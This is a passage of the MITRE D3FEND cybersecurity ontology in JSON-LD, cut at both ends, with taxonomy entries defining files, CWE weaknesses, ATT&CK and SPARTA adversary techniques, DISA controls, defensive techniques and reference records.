      "d3f:definition": "A shortcut file, or shortcut, is a handle that allows the user to find a file or resource located in a different directory or folder from the place where the shortcut is located.\n\nShortcuts, which are supported by the graphical file browsers of some operating systems, may resemble symbolic links but differ in a number of important ways. One difference is what type of software is able to follow them:\n\n - Symbolic links are automatically resolved by the file system. Any software program, upon accessing a symbolic link, will see the target instead, whether the program is aware of symbolic links or not.\n\n - Shortcuts are treated like ordinary files by the file system and by software programs that are not aware of them. Only software programs that understand shortcuts (such as the Windows shell and file browsers) treat them as references to other files.\n\nAnother difference is in the capabilities of the mechanism:\n\n - Microsoft Windows shortcuts normally refer to a destination by an absolute path (starting from the root directory), whereas POSIX symbolic links can refer to destinations via either an absolute or a relative path. The latter is useful if both the location and destination of the symbolic link share a common path prefix, but that prefix is not yet known when the symbolic link is created (e.g., in an archive file that can be unpacked anywhere).\n\n - Microsoft Windows application shortcuts contain additional metadata that can be associated with the destination, whereas POSIX symbolic links are just strings that will be interpreted as absolute or relative pathnames.\n\n - Unlike symbolic links, Windows shortcuts maintain their references to their targets even when the target is moved or renamed. Windows domain clients may subscribe to a Windows service called Distributed Link Tracking to track the changes in files and folders in which they are interested. The service maintains the integrity of shortcuts, even when files and folders are moved across the network. Additionally, in Windows 9x and later, Windows shell tries to find the target of a broken shortcut before proposing to delete it.",
      "rdfs:label": "Shortcut File",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Shortcut_(computing)"
        },
        {
          "@id": "http://dbpedia.org/resource/Symbolic_link#Shortcuts"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CCI-000774_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses organization-defined replay-resistant authentication mechanisms for network access to privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000774"
    },
    {
      "@id": "d3f:CWE-1262",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1262",
      "d3f:definition": "The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers.",
      "rdfs:label": "Improper Access Control for Register Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "skos:prefLabel",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:CWE-1283",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1283",
      "d3f:definition": "The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary.",
      "rdfs:label": "Mutable Attestation or Measurement Reporting Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CWE-206",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-206",
      "d3f:definition": "The product performs multiple behaviors that are combined to produce a single result, but the individual behaviors are observable separately in a way that allows attackers to reveal internal state or internal decision points.",
      "rdfs:label": "Observable Internal Behavioral Discrepancy",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-205"
      }
    },
    {
      "@id": "d3f:Software-definedRadio",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Receiver"
        },
        {
          "@id": "d3f:Software-definedRadioConfiguration"
        }
      ],
      "d3f:definition": "Software-defined radio (SDR) is a radio communication system where components that conventionally have been implemented in analog hardware (e.g. mixers, filters, amplifiers, modulators/demodulators, detectors, etc.) are instead implemented by means of software on a computer or embedded system.",
      "d3f:may-contain": {
        "@id": "d3f:Transmitter"
      },
      "d3f:synonym": "SDR",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Software-defined_radio"
      },
      "rdfs:label": "Software-defined Radio",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N9e55cdd2384a49acb977f953376c57d0"
        },
        {
          "@id": "_:N75a29e45d43c490a8e6093466822bba1"
        },
        {
          "@id": "_:Ndec4dad8d5884b44bf28cd08344c6190"
        }
      ]
    },
    {
      "@id": "_:N9e55cdd2384a49acb977f953376c57d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:N75a29e45d43c490a8e6093466822bba1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioConfiguration"
      }
    },
    {
      "@id": "_:Ndec4dad8d5884b44bf28cd08344c6190",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Transmitter"
      }
    },
    {
      "@id": "d3f:ATLASCredentialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0013"
      },
      "rdfs:label": "Credential Access Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Nca8a1419f93f4b71ac62899995d7364e"
        }
      ],
      "skos:prefLabel": "Credential Access Technique"
    },
    {
      "@id": "_:Nca8a1419f93f4b71ac62899995d7364e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0013"
      }
    },
    {
      "@id": "d3f:SymbolicLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": {
        "@id": "d3f:File"
      },
      "d3f:definition": "A symbolic link (also symlink or soft link) is a term for any file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Symbolic_link"
      },
      "rdfs:label": "Symbolic Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:FileSystemLink"
        },
        {
          "@id": "_:Nd4816085d3de4a228aab9aafc68efb2c"
        }
      ],
      "skos:altLabel": [
        "Soft Link",
        "Softlink",
        "Symlink"
      ]
    },
    {
      "@id": "_:Nd4816085d3de4a228aab9aafc68efb2c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1591",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591",
      "d3f:definition": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.",
      "rdfs:label": "Gather Victim Org Information",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:EX-0013.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0013.02",
      "d3f:definition": "In this variant, the attacker injects non-useful energy or data, noise, malformed frames, or near-valid messages, so receivers and parsers labor to acquire, decode, and reject it. At the RF layer, wideband or protocol-shaped interference drives AGC and clock recovery to hunt, elevates BER, and forces repeated acquisitions; at the link layer, frames with correct preambles but bad CRCs keep decoders busy while yielding no payload; at the application layer, malformed packets force parse/validate/deny cycles that still consume CPU and fill error logs. On internal buses, collisions or bursts of misaddressed traffic reduce effective bandwidth and reorder legitimate messages. Even though little of the injected content passes semantic checks, the effort of dealing with it crowds out real work and may trigger retransmission storms or fallback modes that further increase load. The hallmark is volumetric invalid activity, crafted to engage front ends and parsers just long enough, that degrades integrity and availability without relying on privileged or authenticated commands.",
      "rdfs:label": "Erroneous Input - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0013/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0013"
      },
      "skos:prefLabel": "Erroneous Input"
    },
    {
      "@id": "d3f:T1639.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1639.001",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "rdfs:label": "Exfiltration Over Unencrypted Non-C2 Protocol - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1639"
      },
      "skos:prefLabel": "Exfiltration Over Unencrypted Non-C2 Protocol"
    },
    {
      "@id": "d3f:T1132.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1132.002",
      "d3f:definition": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding)",
      "rdfs:label": "Non-Standard Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:T1132"
      }
    },
    {
      "@id": "d3f:T1037.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1037.005",
      "d3f:definition": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)",
      "d3f:modifies": {
        "@id": "d3f:SystemStartupDirectory"
      },
      "rdfs:label": "Startup Items",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1037"
        },
        {
          "@id": "_:N8d55ae2ac7234bf1b03aab21c6b59a8c"
        }
      ]
    },
    {
      "@id": "_:N8d55ae2ac7234bf1b03aab21c6b59a8c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemStartupDirectory"
      }
    },
    {
      "@id": "d3f:T1571",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1571",
      "d3f:definition": "Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Non-Standard Port",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:Nf5feb50a991e498399aca9b2f3846428"
        }
      ]
    },
    {
      "@id": "_:Nf5feb50a991e498399aca9b2f3846428",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:DE-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0001",
      "d3f:definition": "The adversary suppresses or alters fault detection, isolation, and recovery (FDIR) so unauthorized actions proceed without triggering safing or alerts. Targets include watchdogs and heartbeat monitors; limit and sanity checks on sensor/command values; command interlocks and inhibit masks; voting and redundancy-management logic; and event/alert generation and routing. Techniques range from patching or bypassing checks in flight code, to rewriting parameter/limit tables, to muting publishers that report faults. More subtle variants desensitize thresholds, freeze counters, or delay responses just long enough for a malicious sequence to complete. With FDIR dulled or offline, anomalous states resemble nominal behavior and automated mitigations do not engage, masking the attack from ground oversight.",
      "rdfs:label": "Disable Fault Management - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "Disable Fault Management"
    },
    {
      "@id": "d3f:VirtualAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A virtual address in memory is a pointer or marker for a memory space that an operating system allows a process to use. The virtual address points to a location in primary storage that a process can use independently of other processes.",
      "d3f:synonym": "Logical Address",
      "rdfs:isDefinedBy": {
        "@id": "https://www.techopedia.com/definition/9934/virtual-address-va"
      },
      "rdfs:label": "Virtual Address",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/page/Virtual_address_space"
        },
        {
          "@id": "https://en.wikipedia.org/wiki/Memory_address#Logical_addresses"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "d3f:RegSetKeyValueW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetKeyValueW"
    },
    {
      "@id": "d3f:windows-registry-key",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x value y: The key-value pair x has the key y.",
      "rdfs:label": "windows-registry-key",
      "rdfs:subPropertyOf": {
        "@id": "d3f:windows-registry-data-property"
      },
      "skos:altLabel": "key"
    },
    {
      "@id": "d3f:ContainerImageAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContainerImageAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:ContainerImage"
      },
      "d3f:d3fend-id": "D3-CIA",
      "d3f:definition": "Analyzing a Container Image with respect to a set of policies.",
      "d3f:kb-article": "## How it works\n\nContainer images are standalone collections of the executable code and\ncontent that are used to populate a container environment.\nThey are usually created by either building a container from scratch or by\nbuilding on top of an existing image pulled from a repository.\n\nThroughout the container build workflow,\nimages should be scanned to identify:\n\n- outdated libraries,\n- known vulnerabilities,\n- or misconfigurations, such as insecure ports or permissions.\n\nScanning should also provide the flexibility to disregard false positives\nfor vulnerability detection where knowledgeable\ncybersecurity professionals have deemed alerts to be inaccurate.\n\nOne approach to implementing image scanning is to use an admission controller\nto block deployments if the image does not comply with the organization's\nsecurity policies.\n\nAn admission controller is a Container Orchestration feature that can intercept and\nprocess requests to the Container Orchestration API prior to persistence of the object,\nbut after the request is authenticated and authorized.\nA webhook can be implemented to scan any image before it is deployed in the orchestrator.\nThis admission controller\n\n## Considerations\n\n* Image scanning is key to ensuring deployed containers are secure.\n* Using trusted repositories to build containers is a critical part of the container build workflow.\n* This technique does not necessarly prevent the build process to add insecure or unsecured\n  files to the Image.\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ContainerImageAnalysis"
      },
      "d3f:synonym": "Container Image Scanning",
      "rdfs:label": "Container Image Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetVulnerabilityEnumeration"
        },
        {
          "@id": "_:N5a3f67b668a947159d123b8068e929e6"
        }
      ]
    },
    {
      "@id": "_:N5a3f67b668a947159d123b8068e929e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerImage"
      }
    },
    {
      "@id": "d3f:OTIOModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:communicates-with": [
        {
          "@id": "d3f:OTActuator"
        },
        {
          "@id": "d3f:OTSensor"
        }
      ],
      "d3f:definition": "An OT I/O Module is an industrial-grade interface designed for harsh Operational Technology (OT) environments. It reliably connects sensors and actuators to industrial control systems, ensuring precise, real-time data exchange in applications such as SCADA or ICS. Engineered for ruggedness and consistent performance, it can manage analog, digital, or other specialized signal types while enduring demanding conditions.",
      "rdfs:comment": "There are many types of I/O modules, including: analog input, analog output, HART input, HART output, digital input, digital output, mV input, pulse input, universal I/O, vibration input, and many other types of input or output modules. The functionality of the I/O Module can be embedded in the controller or as a separate module connected via chassis or I/O link.",
      "rdfs:isDefinedBy": {
        "@id": "https://consteel-electronics.com/articles/what-is-IO-module"
      },
      "rdfs:label": "OT I/O Module",
      "rdfs:seeAlso": {
        "@id": "https://www.rockwellautomation.com/en-us/support/documentation/technical/i-o/compact-5000-i-o-modules.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IOModule"
        },
        {
          "@id": "_:Nd99809856a3046c791a2656dafa1e820"
        },
        {
          "@id": "_:Nffa7be9df45d448299d294b438cf0616"
        }
      ],
      "skos:example": "Rockwell Compact 5000 IO Module"
    },
    {
      "@id": "_:Nd99809856a3046c791a2656dafa1e820",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:communicates-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTActuator"
      }
    },
    {
      "@id": "_:Nffa7be9df45d448299d294b438cf0616",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:communicates-with"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSensor"
      }
    },
    {
      "@id": "d3f:T1499.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1499.004",
      "d3f:definition": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.",
      "rdfs:label": "Application or System Exploitation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1499"
      }
    },
    {
      "@id": "d3f:T1547.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.007",
      "d3f:definition": "Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to \"Reopen windows when logging back in\".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.",
      "d3f:modifies": {
        "@id": "d3f:ApplicationConfigurationFile"
      },
      "rdfs:label": "Re-opened Applications",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:N89e09e43ccd14f01a3cd8f30eede2dfc"
        }
      ]
    },
    {
      "@id": "_:N89e09e43ccd14f01a3cd8f30eede2dfc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfigurationFile"
      }
    },
    {
      "@id": "d3f:ExceptionHandler",
      "@type": "owl:Class",
      "d3f:definition": "An exception handler is a code segment that processes an exception.",
      "rdfs:label": "Exception Handler",
      "rdfs:seeAlso": {
        "@id": "dbr:Exception_handling"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CWE-1279",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1279",
      "d3f:definition": "Performing cryptographic operations without ensuring that the supporting inputs are ready to supply valid data may compromise the cryptographic result.",
      "rdfs:label": "Cryptographic Operations are run Before Supporting Units are Ready",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-665"
        },
        {
          "@id": "d3f:CWE-696"
        }
      ]
    },
    {
      "@id": "d3f:Reference-SMBCopyAndExecution_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-05-005/"
      },
      "d3f:kb-abstract": "An adversary needs to gain access to other hosts to move throughout an environment. In many cases, this is a twofold process. First, a file is remotely written to a host via an SMB share (detected by CAR-2013-05-003). Then, a variety of Execution techniques can be used to remotely establish execution of the file or script. To detect this behavior, look for files that are written to a host over SMB and then later run directly as a process or in the command line arguments. SMB File Writes and Remote Execution may happen normally in an environment, but the combination of the two behaviors is less frequent and more likely to indicate adversarial activity.\n\nThis can possibly extend to more copy protocols in order to widen its reach, or it could be tuned more finely to focus on specific program run locations (e.g. %SYSTEMROOT%\\system32) to gain a higher detection rate.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-05-005: SMB Copy and Execution",
      "rdfs:label": "Reference - CAR-2013-05-005: SMB Copy and Execution - MITRE"
    },
    {
      "@id": "d3f:SharedLibraryFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A shared library file is a file that is intended to be shared by executable files and further shared library (object) files. Modules used by a program are loaded from individual shared objects into memory at load time or runtime, rather than being copied by a linker when it creates a single monolithic executable file for the program",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Library_(computing)#Shared_libraries"
      },
      "rdfs:label": "Shared Library File",
      "rdfs:subClassOf": {
        "@id": "d3f:ObjectFile"
      },
      "skos:altLabel": [
        "Shared Library",
        "Shared Object"
      ]
    },
    {
      "@id": "d3f:CCI-000194_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces password complexity by the minimum number of numeric characters used.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000194"
    },
    {
      "@id": "d3f:T1678",
      "@type": "owl:Class",
      "d3f:attack-id": "T1678",
      "d3f:definition": "Adversaries may employ various time-based methods to evade detection and analysis. These techniques often exploit system clocks, delays, or timing mechanisms to obscure malicious activity, blend in with benign activity, and avoid scrutiny. Adversaries can perform this behavior within virtualization/sandbox environments or natively on host systems.",
      "rdfs:label": "Delay Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:SpacecraftSafeMode",
      "@type": "owl:Class",
      "d3f:definition": "Safe mode is an operating mode of a modern uncrewed spacecraft during which all non-essential systems are shut down and only essential functions such as thermal management, radio reception and attitude control are active.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Safe_mode_in_spacecraft"
      },
      "rdfs:label": "Spacecraft Safe Mode",
      "rdfs:subClassOf": {
        "@id": "d3f:SafeMode"
      }
    },
    {
      "@id": "d3f:ServiceDependencyMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ServiceDependencyMapping"
      ],
      "d3f:d3fend-id": "D3-SVCDM",
      "d3f:definition": "Service dependency mapping determines the services on which each given service relies.",
      "d3f:kb-article": "## How it works\nThe organization collects and models architectural information about the services and consumers of services and maps the dependencies between the services.\n\n## Considerations\n* Architectural design artifacts and SMEs may need to be consulted to determine if dependencies are intended or otherwise essential.\n* Service dependencies for critical systems--those supporting critical organizational activities--should be prioritized for supply chain risk analysis.\n* Service dependencies in cloud or microservice architectures may be discovered using distributed tracing capabilities",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-TivoliApplicationDependencyDiscoverManager7_3_0DependenciesBetweenResources"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": {
        "@id": "d3f:ServiceDependency"
      },
      "d3f:synonym": "Distributed Tracing",
      "rdfs:label": "Service Dependency Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemMapping"
        },
        {
          "@id": "_:N59f3a5e0995444cab017547a57218c1c"
        }
      ]
    },
    {
      "@id": "_:N59f3a5e0995444cab017547a57218c1c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceDependency"
      }
    },
    {
      "@id": "d3f:Reference-WhatIsNetworkAccessControl",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.fortinet.com/resources/cyberglossary/what-is-network-access-control"
      },
      "d3f:kb-abstract": "Network access control (NAC), also known as network admission control, is the process of restricting unauthorized users and devices from gaining access to a corporate or private network. NAC ensures that only users who are authenticated and devices that are authorized and compliant with security policies can enter the network.",
      "d3f:kb-organization": "Fortinet",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:LANAccessMediation"
        },
        {
          "@id": "d3f:NetworkAccessMediation"
        },
        {
          "@id": "d3f:RoutingAccessMediation"
        }
      ],
      "d3f:kb-reference-title": "What is Network Access Control?",
      "rdfs:label": "Reference - What is Network Access Control?"
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForDetectionOfAChangeInBehaviorInTheUseOfAWebsiteThroughVectorVelocityAnalysis_SilverTailSystems",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20100235909A1/en?oq=US+20100235909+A1"
      },
      "d3f:kb-abstract": "A system and software for identifying the change of user behavior on a website includes analyzing the actions of users on a website comprising a plurality of fields or input parameters that identify the actions performed on a website including fields related to previous actions by that user or other users of the website. The fields or input parameters are represented in a vector format where vectors represent different sessions of activity on the website, pages of the website, users of the website, or other attributes of the use of a website. Analysis is performed to determine if new sessions are similar or dissimilar to previously known sessions and if a session is converging or diverging from known sessions based on the velocity and direction of the velocity of the vectors in the vector space.",
      "d3f:kb-author": "Mike Eynon; Laura Mather; Erik Westland; Jim Lloyd",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting fraudulent behavior on a website. Website behavior is mapped to build a multidimensional representation of user actions on a website that is updated as additional actions are recorded. Example actions on a website that are recorded include clicks by a user on the website and entering data into forms. Current behavior is compared against baseline recorded behavior and if current behavior deviates above a threshold, an alert is issued.",
      "d3f:kb-organization": "Silver Tail Systems",
      "d3f:kb-reference-of": {
        "@id": "d3f:WebSessionActivityAnalysis"
      },
      "d3f:kb-reference-title": "System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis",
      "rdfs:label": "Reference - System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis - Silver Tail Systems"
    },
    {
      "@id": "d3f:CertificateFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Certificate"
      },
      "d3f:definition": "A file containing a digital certificate. In cryptography, a public key certificate (also known as a digital certificate or identity certificate) is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Public_key_certificate"
      },
      "rdfs:label": "Certificate File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:Nd9936b94889f4bf8b3bed13175eb2b6e"
        }
      ]
    },
    {
      "@id": "_:Nd9936b94889f4bf8b3bed13175eb2b6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:abuses",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x abuses y: The entity x applies an artifact y to a wrong thing or person; x applies y badly or incorrectly.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01163606-v"
      },
      "rdfs:label": "abuses",
      "rdfs:subPropertyOf": {
        "@id": "d3f:uses"
      },
      "skos:altLabel": [
        "misapplies",
        "misuses"
      ]
    },
    {
      "@id": "d3f:WriteProtectSwitch",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A physical device used to restrict configuration of a device.",
      "d3f:restricts": {
        "@id": "d3f:Storage"
      },
      "rdfs:label": "Write Protect Switch",
      "rdfs:seeAlso": [
        {
          "@id": "https://web-material3.yokogawa.com/FGP-110__5_.us.pdf"
        },
        "NIST SP 800-82r3, Appendix F, SC-51 Hardware-Based Protection"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDevice"
        },
        {
          "@id": "_:N773b5d8d49fa4a43abff685163b4319d"
        }
      ]
    },
    {
      "@id": "_:N773b5d8d49fa4a43abff685163b4319d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Storage"
      }
    },
    {
      "@id": "d3f:FTPGetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is downloaded from an FTP server to a client, retrieving data from the remote system to the local destination.",
      "rdfs:label": "FTP Get Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FTPEvent"
        },
        {
          "@id": "_:N78bdfc7b17c2421eab0ca6455ceac510"
        }
      ]
    },
    {
      "@id": "_:N78bdfc7b17c2421eab0ca6455ceac510",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FTPPutEvent"
      }
    },
    {
      "@id": "d3f:CWE-670",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-670",
      "d3f:definition": "The code contains a control flow path that does not reflect the algorithm that the path is intended to implement, leading to incorrect behavior any time this path is navigated.",
      "rdfs:label": "Always-Incorrect Control Flow Implementation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:Reference-UACBypass_MITRE",
      "@type": [
